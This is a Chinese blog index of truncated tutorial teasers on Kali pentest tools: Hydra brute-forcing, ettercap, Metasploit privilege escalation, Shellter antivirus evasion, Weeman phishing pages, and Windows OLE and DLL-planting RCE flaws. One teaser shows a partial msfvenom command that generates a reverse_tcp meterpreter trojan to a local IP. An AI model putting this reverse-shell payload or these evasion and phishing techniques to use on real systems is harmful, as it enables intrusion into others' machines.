hydra是一款全能的暴力破解工具，功能強大，幾乎支持所有的協議，是著名黑客組織thc開發的。 在Kali Linux下已經是默認安裝的，於是測試爆破一下自己的一台VM虛擬機服務器。hydra還支持 ...

筆記一：ettercap是什么？ 我們在對WEB安全檢測的時候都會用到Cain和netfuke這兩款工具，功能相信用過的朋友多多少少都知道，但這兩款工具是在windows下運行的。 而etterc ...

在WEB滲透中當我們拿到webshell了，我們可以試試用MSF(metasploit)來進行提權，在MSF里meterpreter很強大的！ 我們先用msfvenom生成一個EXE的木馬后門。 ...

Shellter 是一款動態 shellcode 注入工具，我們可以將shellcode注入到其它程序上，從而來躲避殺毒軟件的查殺。俗稱為免殺 官網：https://www.shellterproj ...

Microsoft Windows OLE遠程代碼執行漏洞，OLE（對象鏈接與嵌入）是一種允許應用程序共享數據和功能的技術， 遠程攻擊者利用此漏洞通過構造的網站執行任意代碼，影響Win95+IE3 ...

MSF是Metasploit的簡稱，Metasploit是一款開源的安全漏洞檢測工具，非常強大，分別有Windows版和Linux版，工具里集成了許多微軟公布的漏洞(0day)。 我這里做測試的系統 ...

kali Linux的主版本自帶的是Gnome桌面環境，安裝后使用效率太低，不知道是不是我機器配置低的原因， 在虛擬機里運行起來太慢、卡、丑啦...。所以以前都一直都在用Backbox Linux， ...

名稱：Microsoft DLL植入遠程代碼執行漏洞(CVE-2015-0096)(MS15-020) 了解：Microsoft Windows沒有正確處理DLL文件的加載，存在遠程代碼執行漏洞，通 ...

生成反彈木馬： 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > ab ...

下午無聊再網上閑逛隨意看了下，自己做了一次測試，目前最新的版本是1.6。Weeman是一款運行在Python環境下的釣魚滲透測試工具 但這款工具簡單易用，安裝簡單，可偽造HTML頁面等等。。。網上看 ...